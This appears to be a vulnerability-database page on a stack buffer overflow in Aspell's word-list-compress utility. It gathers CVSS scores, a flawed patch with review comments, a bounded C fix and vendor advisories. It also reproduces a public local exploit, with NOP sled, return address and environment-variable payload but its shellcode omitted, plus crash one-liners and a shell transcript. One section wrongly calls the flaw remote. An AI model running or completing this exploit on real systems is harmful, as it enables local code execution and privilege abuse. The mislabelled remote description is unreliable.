Published: 2004-08-06 00:00:00
Revised: 2016-11-28 14:06:27

[Original] Multiple stack-based buffer overflows in the word-list-compress functionality in compress.c for Aspell allow local users to execute arbitrary code via a long entry in the wordlist that is not properly handled when using the (1) "c" compress option or (2) "d" decompress option.

[CNNVD] GNU Aspell Stack Buffer Overflow Vulnerability (CNNVD-200408-109)


- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may lead to a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:gnu:aspell:0.50.5    GNU Aspell 0.50.5
cpe:/o:gentoo:linux:1.4     Gentoo Linux 1.4

- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20040608 Aspell 'word-list-compress' stack overflow vulnerability
(UNKNOWN)  BID  10497

- Vulnerability information

GNU Aspell Stack Buffer Overflow Vulnerability
High risk    Boundary condition error
2004-08-06 00:00:00 2005-10-20 00:00:00

- Advisories and patches

        * The following temporary patch can be applied:
        --- aspell-bug.patch ---
        --- compress.orig.c 2004-06-08 16:37:00.000000000
        +++ compress.c 2004-06-08 16:34:35.000000000 +0100
        @@ -28,6 +28,9 @@
        +int count;
         void usage ()
         fputs("Compresses or uncompresses sorted word
        lists.\n" , stderr);
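Review bot: `int count;` is introduced as a file-scope global that both the compress and decompress paths share, and none of the later hunks reset it between words, so whatever limit it feeds is cumulative over the whole run. The overflow is a per-word problem; the bound belongs inside get_word, checked against the size of the destination buffer, rather than in a global counter.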
        @@ -47,6 +50,7 @@
         *w++ = (char)(c);
         } while (c = getc(in), c != EOF && c > 32);
         *w = '\0';
        + count++;
         ungetc(c, in);
         if (c == EOF) return 0;
         else return 1;
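Review bot: `count++` sits after the do/while loop, so it counts words read, not bytes stored; the `*w++ = (char)(c);` store inside the loop is still unbounded and a single over-long entry overruns the buffer exactly as before. The check has to go inside the loop, stopping (or failing) before `w` reaches the end of the destination buffer.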
        @@ -69,6 +73,7 @@
         SETBIN (stdout);
        + while(count < 256) {
         while (get_word(stdin, cur)) {
         int i = 0;
         /* get the length of the prefix */
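Review bot: `while(count < 256) {` wrapping the compress loop only caps how many words are processed; it does not bound the length of any one word, so the overflow in get_word is still reachable on the very first entry. It also makes the utility silently stop after 256 words, truncating the compressed output for any larger list.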
        @@ -85,6 +90,7 @@
         prev = s2; cur = s1;
        + }
         return 0;
         } else if (argv[1][0] == 'd') {
        @@ -100,8 +106,11 @@
         if (i == 0)
         i = getc(stdin);
        - while ((c = getc(stdin)) > 32)
        + while ((c = getc(stdin)) > 32 && count < 256) {
         cur[i++] = (char)c;
        + count++;
        + }
         cur[i] = '\0';
         fputs(cur, stdout);
         putc('\n', stdout);
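Review bot: in decompress mode `count` accumulates across all words and is never reset, so after 256 bytes in total every later word is cut short, while the quantity that actually matters, the index `i`, is still unchecked. `i` is seeded from `getc(stdin)` (the prefix length, up to 255) before the loop, so `cur[i++] = (char)c;` can run past the end of `cur` well before the global counter reaches 256. Compare `i` against the declared size of `cur` inside the loop instead of using `count`.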
        --- EOF ---
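A bounded replacement for the reader shown in the hunks above, added here as an example (it is neither the Aspell project's code nor the patch author's). It assumes a 256-byte word buffer; the names `get_word_bounded`, `read_word_of_len` and `scan_sample_list` are mine, and the word lists are constructed in memory with fmemopen so the code runs offline.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define WORD_CAP 256   /* assumed size of the fixed word buffer in compress.c */
enum { WORD_EOF = 0, WORD_OK = 1, WORD_TOO_LONG = -1 };
/* Hardened reader. Unlike get_word() in the hunks above, the destination size
   travels with the pointer and the copy stops one byte short of it; an over-long
   word is reported, not truncated, and its unread tail stays in the stream. */
static int get_word_bounded(FILE *in, char *buf, size_t cap) {
    size_t n = 0; int c;
    if (cap == 0) return WORD_TOO_LONG;
    while ((c = getc(in)) != EOF && c <= 32) { }   /* skip separators */
    while (c != EOF && c > 32) {
        if (n + 1 >= cap) { buf[n] = '\0'; ungetc(c, in); return WORD_TOO_LONG; }
        buf[n++] = (char)c;
        c = getc(in);
    }
    buf[n] = '\0';
    if (c != EOF) ungetc(c, in);
    return n > 0 ? WORD_OK : WORD_EOF;
}

/* Verdict for one constructed word of `len` 'a' bytes read into a WORD_CAP
   buffer: WORD_OK up to 255 bytes, WORD_TOO_LONG from 256, WORD_EOF if empty. */
static int read_word_of_len(size_t len) {
    char word[WORD_CAP], *data = malloc(len + 2);
    int rc = -2;
    if (!data) return rc;
    memset(data, 'a', len); data[len] = '\n'; data[len + 1] = '\0';
    FILE *in = fmemopen(data, len + 1, "r");
    if (in) { rc = get_word_bounded(in, word, sizeof word); fclose(in); }
    free(data);
    return rc;
}

/* Scans a constructed list (two short words, then a 300-byte word like the crash
   input on this page); returns words accepted before the rejection, -1 if none. */
static int scan_sample_list(void) {
    char list[311], word[WORD_CAP];
    int accepted = 0, rc;
    memcpy(list, "ab\napple\n", 9); memset(list + 9, 'a', 300);
    list[309] = '\n'; list[310] = '\0';
    FILE *in = fmemopen(list, 310, "r");
    if (!in) return -2;
    while ((rc = get_word_bounded(in, word, sizeof word)) == WORD_OK) accepted++;
    fclose(in);
    return rc == WORD_TOO_LONG ? accepted : -1;
}
```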

- Vulnerability information (669)

Aspell (word-list-compress) Command Line Stack Overflow (EDBID:669)
linux local
2004-12-01 Verified
0 c0d3r
N/A
  Fuck private exploits .
  Fuck iranian hacking (and security !!) teams who are just some fucking kiddies.
  Fuck all "Security money makers"
  word-list-compress local exploit - SECU
  Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com
  word-list-compress is not setuid . so good for backdooring .
  gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members.
  we are : LorD - c0d3r - NT ; 6667 #ihs

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define address 0xbffff2b8   /* hard-coded return address for the author's 32-bit Slackware box */
#define size 350

/* Reads the stack pointer on 32-bit x86 with gcc; the value is left in
   eax, which this code relies on being the return register. */
unsigned long get_sp(void)
{
        __asm__("movl %esp, %eax");
}

int main()
{
char shellcode[] = /* 37 bytes shellcode written by myself */
        "";   /* PLACEHOLDER: the author's shellcode bytes are not reproduced on this page */
char exploit[size] ;
char *ptr;
long *addr_ptr;
char test[300];   /* unused in the original */
long addr;        /* unused in the original */
int NL= 180 ;     /* length of the NOP sled; the shellcode follows it */
int i ;
int x=0 ;
ptr = exploit;
addr_ptr = (long *) ptr;

/* fill the buffer with the return address, one 4-byte word at a time
   (the bound keeps the last word inside the 350-byte buffer) */
for(i=0;i + 4 <= size;i+=4){
*(addr_ptr++) = address;
}
/* NOP sled at the front */
for(i=0 ; i < NL ; i++ )
exploit[i] = NOP;
/* copy the shellcode directly after the sled */
if(shellcode != NULL){
while(x != strlen(shellcode)){
exploit[NL] = shellcode[x];
NL++;
x++;
}
}
exploit[size - 1] = 0x00;   /* terminate inside the buffer (the original wrote one byte past it) */

printf("word-list-compress local exploit by root / c0d3r\n");
printf("stack pointer: 0x%x\n", get_sp());
printf("using return address : 0x%x\n", address);
printf("using %d bytes shellcode\n", sizeof(shellcode));
setenv("exploit", exploit, 1);
printf("exploit string loaded into the enviroment\n");
system("echo $exploit | word-list-compress c");
return 0;
}


root@darkstar:/sploits# word-list-compress
Compresses or uncompresses sorted word lists.
For best result the locale should be set to C
before sorting by setting the environmental
variable LANG to "C" before sorting.
Copyright 2001 by Kevin Atkinson.
Usage: word-list-compress c[ompress]|d[ecompress]


root@darkstar:/sploits# echo `perl -e 'print "A"x300'` |
word-list-compress c
Segmentation fault (core dumped)
root@darkstar:/sploits# gdb -c core
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux".
Core was generated by `word-list-compress c'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40154c20 1075137568
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffff560 0xbffff560
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x210246 2163270
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
---Type <return> to continue, or q <return> to quit---


root@darkstar:/sploits# gcc word-list-compress.c -o word-list-compress
word-list-compress.c:65:2: warning: no newline at end of file
root@darkstar:/sploits# ./word-list-compress
word-list-compress local exploit by root / c0d3r
stack pointer: 0xbffff268
using return address : 0xbffff2b8
using 37 bytes shellcode
exploit string loaded into the enviroment
 [1 C[C KS /bin/sh sh-2.05b# echo IHS


thats all . have fun !

// [2004-12-01]

- Vulnerability information

Aspell word-list-compress Local Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Aspell. The issue is due to a boundary error within the word-list-compress utility when processing word lists. By sending a specially crafted word list containing an overly long string (more than 256 bytes), a remote attacker can cause a buffer overflow and execute arbitrary code on the system, resulting in a loss of confidentiality and integrity.

- Timeline

2004-06-08 Unknown
2004-06-08 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Kevin Atkinson has released a patch to address this vulnerability.

- References

- Credit

- Vulnerability information

GNU Aspell Stack Buffer Overflow Vulnerability
Boundary Condition Error 10497
No Yes
2004-06-08 12:00:00 2009-07-12 05:16:00
Shaun Colley <> disclosed this vulnerability to Bugtraq.

- Affected versions

Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
GNU Aspell 0.50.5
Gentoo Linux 1.4

- Discussion

It is reported that the word-list-compress utility, which is part of aspell, contains a buffer overflow vulnerability.

The word-list-compress utility is used for the compression and decompression of word lists. Improper bounds checking allows a buffer overflow condition that leads to code execution in the context of the victim's account.

An attacker would need to be able to influence the contents of another user's dictionary to exploit this issue, potentially through social engineering, improper file permissions, or a file association vulnerability.

- Exploitation

Some proof of concept examples were provided by Shaun Colley <>.

echo `perl -e 'print "a"x1000'` | word-list-compress c
echo `perl -e 'print "a"x1000'` | word-list-compress d

These commands should produce a segmentation fault, with the resulting core dumps showing the ability of the attacker to influence the execution of the utility.

c0d3r / root . provided a proof of concept exploit:

- Solution

Mandrake has released an advisory (MDKSA-2004:153) dealing with this issue. Please see the referenced advisory for more information.

Gentoo Linux has released advisory GLSA 200406-14 dealing with this issue. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following as superuser:
emerge sync
emerge -pv ">=app-text/aspell-0.50.5-r2"
emerge ">=app-text/aspell-0.50.5-r2"

Gentoo has released a revision to their initial advisory. Users are recommended to update their packages to the latest available using the emerge tool. Please see the referenced advisory for more information.

OpenPKG has released an advisory (OpenPKG-SA-2004.042) dealing with this issue. Please see the referenced advisory for more information.

GNU Aspell 0.50.5
Mandriva Linux Mandrake 10.0
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.1 x86_64

- References